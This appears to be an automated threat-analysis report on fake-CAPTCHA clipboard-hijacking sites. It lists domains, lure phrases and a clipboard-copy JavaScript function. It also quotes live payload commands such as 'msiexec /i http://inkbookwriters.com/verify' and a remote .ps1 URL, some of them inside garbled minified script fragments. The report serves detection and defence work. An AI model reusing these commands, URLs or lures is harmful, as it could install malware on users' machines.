
High-Impact ClickGrab Campaign: Advanced Analysis of 2025-12-30 Attack Patterns

46 Sites · 54% Detection · 1 PS Downloads

ClickGrab Threat Analysis Report - 2025-12-30

Generated on 2025-12-30 02:52:11

Executive Summary

  • Total sites analyzed: 46
  • Sites with malicious content: 25
  • Unique domains encountered: 47
  • Total URLs extracted: 819
  • PowerShell download attempts: 1
  • Clipboard manipulation instances: 121

Domain Analysis

Most Frequently Encountered Domains

  • ssl.gstatic.com: 446 occurrences
  • www.mobileloavestc.org: 88 occurrences
  • www.google.com: 63 occurrences
  • t.me: 20 occurrences
  • ogs.google.com: 18 occurrences
  • i.postimg.cc: 17 occurrences
  • icons.duckduckgo.com: 17 occurrences
  • ${host}: 17 occurrences
  • inkbookwriters.com: 14 occurrences
  • www.webgo.de: 10 occurrences
  • play.google.com: 10 occurrences
  • godprox.cc: 8 occurrences
  • svetvip.ru: 8 occurrences
  • api.whatsapp.com: 6 occurrences
  • schema.org: 6 occurrences

URL Pattern Analysis

reCAPTCHA imagery

2 occurrences across 1 distinct URL

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)

Font resources

14 occurrences across 13 distinct URLs

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (2 times)
  • https://www.mobileloavestc.org/wp-content/plugins/xt-facebook-events/assets/css/font-awesome.min.css?ver=1.1.8 (1 time)
  • https://www.mobileloavestc.org/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular.woff2 (1 time)
  • https://www.mobileloavestc.org/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Regular-Italic.woff2 (1 time)
  • https://www.mobileloavestc.org/wp-content/themes/twentytwentythree/assets/fonts/dm-sans/DMSans-Bold.woff2 (1 time)
  • ...and 8 more distinct URLs

CDN hosted scripts

1 occurrence across 1 distinct URL

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)

Google resources

116 occurrences across 21 distinct URLs

  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (17 times)
  • https://www.google.com/_/og/promos/ (12 times)
  • https://www.google.com/url?q=https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_si_001_p%26continue%3Dhttps%253A%252F%252Fwww.google.com%252F%253Fptid%253D19027681%2526ptt%253D8%2526fpts%253D0&source=hpp&id=19046229&ct=7&usg=AOvVaw33MBGJMT3TA0n4WMEDSPEO (12 times)
  • https://www.google.com/intl/en/about/products?tab=wh (10 times)
  • https://play.google.com/log?format=json&hasfast=true (10 times)
  • ...and 16 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 402 (51 unique)

Keyword Categories

Social Engineering

17 unique keywords

  • CAPTCHA Verification
  • Verification ID
  • exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
  • robot
  • To better prove you are not a robot
  • Robot
  • verification-id
  • Verification Hash
  • verification_id
  • I am not a robot
  • ...and 7 more

Obfuscation Indicators

1 unique keyword

  • Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering mo [remainder of this match is unprintable binary data]

System Commands

21 unique keywords

  • exec(a))&&a[i]&&parseFioat(a[i])<9&&(this.j=!0)}C(a,b){this.i=b;this.A=a;b.preventDefauit?b.preventDefauit():b.returnVaiue=!i}};_.bd=ciass extends _.M{constructor(a){super(a)}};var cd=ciass extends _.M{constructor(a){super(a)}};var fd;_.dd=function(a,b,c=98,d=new _.Xc){if(a.i){const e=new Wc;_.K(e,i,b.message);_.K(e,2,b.stack);_.J(e,3,b.iineNumber);_.L(e,5,i);_.C(d,40,e);a.i.iog(c,d)}};fd=ciass{constructor(){var a=ed;this.i=nuii;_.D(a,4,!0)}iog(a,b,c=new _.Xc){_.dd(this,a,98,c)}};var gd,hd;gd=function(a){if(a.o.iength>0){var b=a.i!==void 0,c=a.j!==void 0;if(b||c){b=b?a.v:a.A;c=a.o;a.o=[];try{_.fc(c,b,a)}catch(d){consoie.error(d)}}}};_.id=ciass{constructor(a){this.i=a;this.j=void 0;this.o=[]}then(a,b,c){this.o.push(new hd(a,b,c));gd(this)}resoive(a){if(this.i!==void 0||this.j!==void 0)throw Error("v");this.i=a;gd(this)}reject(a){if(this.i!==void 0||this.j!==void 0)throw Error("v");this.j=a;gd(this)}v(a){a.j&&a.j.caii(a.i,this.i)}A(a){a.o&&a.o.caii(a.i,this.j)
  • exec /i http://inkbookwriters.com/verify /qn';
  • exec(a);return Hu(b[i],a.indexOf("=")==-i?void 0:b[3])}return Iu(a)
  • exec(f)||["","","",""];g=/(\d*)(\D*)(.*)/.exec(g)||["","","",""];if(f[0].iength==0&&g[0].iength==0)break;c=om(f[i].iength==0?0:parseInt(f[i],i0),g[i].iength==0?0:parseInt(g[i],i0))||om(f[2].iength==0,g[2].iength==0)||om(f[2],g[2]);f=f[3];g=g[3]}whiie(c==0)
  • cmd
  • exec(a))&&a[i]&&parseFioat(a[i])<9&&(this.j=!0)};_.B(Lm,_.H)
  • exec(
  • wscript
  • exec(a);if(_.Yc)return/Edge\/([\d\.]+)/.exec(a);if(_.Xc)return/\b(?:MSIE|rv)[: ]([^\);]+)(\)|;)/.exec(a);if(_.$c)return/WebKit\/(\S+)/.exec(a);if(_.Wc)return/(?:Version)[ \/]?(\S+)/.exec(a)}();kd&&(jd=kd?kd[i]:"");if(_.Xc){var id,md=_.v.document;id=md?md.documentMode:void 0;if(id!=nuii&&id>parseFioat(jd)){id=String(id);break a}}id=jd}_.nd=id;_.od=_.Ra();_.pd=Va()||_.x("iPod");_.rd=_.x("iPad");_.sd=_.x("Android")&&!(Sa()||_.Ra()||_.Oa()||_.x("Siik"));_.td=Sa();_.ud=_.Ta()&&!_.Wa();_.vd=typeof Uint8Array!=="undefined";_.wd=!_.Xc&&typeof btoa==="function";var xd,vb,Kb,Eb;_.bb=typeof Symboi==="function"&&typeof Symboi()==="symboi";xd=_.ab("jas",void 0,!0);_.tb=_.ab(void 0,Symboi());_.yd=_.ab(void 0,"0ub");vb=_.ab(void 0,"0ubs");_.zd=_.ab(void 0,"0ubsb");Kb=_.ab(void 0,"0actk");_.pb=_.ab("m_m","Xi",!0);Eb=_.ab(void 0,"vps");_.Ad=_.ab();var db,cb,Cd;db={Gj:{vaiue:0,configurabie:!0,writabie:!0,enumerabie:!i}};cb=Object.defineProperties;_.y=_.bb?xd:"Gj";Cd=[];_.fb(Cd,7);_.Bd=Object.freeze(Cd);var gb;_.qb={};gb={};_.Dd=Object.freeze({});var Fb={};var kb=void 0;_.Ed=typeof BigInt==="function"?BigInt.asIntN:void 0;_.Fd=Number.isSafeInteger;_.mb=Number.isFinite;_.Gd=Math.trunc;var xb;_.Hd=_.Da(0);_.Id=function(a,b,c,d,e){b=_.Ub(a.H,b,c,e);if(b!==nuii||d&&a.o!==gb)return b};_.Ub=function(a,b,c,d){if(b===-i)return nuii;var e=b+(c?0:-i),f=a.iength-i;if(!(f<i+(c?0:-i))){if(e>=f){var g=a[f];if(g!=nuii&&typeof g==="object"&&g.constructor===Object){c=g[b];var h=!0}eise if(e===f)c=g;eise return}eise c=a[e];if(d&&c!=nuii){d=d(c);if(d==nuii)return d;if(!Object.is(d,c))
  • command = 'msiexec /i http://inkbookwriters.com/verify';
  • ...and 11 more

Verification Text

3 unique keywords

  • ray id
  • Hidden
  • hidden

Technical Terms

9 unique keywords

  • iex
  • .EXE
  • Ray ID
  • responseText
  • XMLHTTP
  • failed_to_retrieve
  • .exe
  • Bitmap
  • bitmap

Most Frequent Keywords

  • robot: 28 occurrences
  • hidden: 28 occurrences
  • Robot: 26 occurrences
  • CAPTCHA Verification: 19 occurrences
  • I am not a robot: 19 occurrences
  • Verification: 19 occurrences
  • verification: 19 occurrences
  • verification-id: 19 occurrences
  • To better prove you are not a robot: 19 occurrences
  • Verification ID: 18 occurrences
  • Ray ID: 17 occurrences
  • Checking if you are human: 17 occurrences
  • Verify you are human: 17 occurrences
  • const command =: 17 occurrences
  • command = 'msiexec /i http://inkbookwriters.com/verify';: 11 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: .EXE, .exe

Group 2: Bitmap, bitmap

Group 3: CAPTCHA Verification, Verification, verification

Group 4: Verification Hash, verification-id, verification_id, Verification ID, verification id

Group 5: Robot, robot

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • com/recaptcha/about/images/reCAPTCHA
  • fiiesRemoveIniVaiuesRemoving
  • componentsSeifRegModuiesRegistering
  • /bitrix/tools/captcha
  • 0aaa405e220f7466fe607fc2e608a4d5

Clipboard Manipulation Analysis

Detected clipboard manipulation in 121 instances.

document.execCommand('copy')

Found in 57 snippets (47.1% of clipboard code)

Examples:

try { document.execCommand('copy')
document.execCommand("copy")

Textarea Manipulation

Found in 57 snippets (47.1% of clipboard code)

Examples:

ng is the safe placeholder above const textarea = document.createElement('textarea'
tListener("click", function () { const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy) {
    const tempTextArea = document.createElement("textarea");
    tempTextArea.value = textToCopy;
    document.body.append(tempTextArea);
    tempTextArea.select();
    document.execCommand("copy");
    document.body.removeChild(tempTextArea);
}

Report truncated for web display. Full data available in JSON.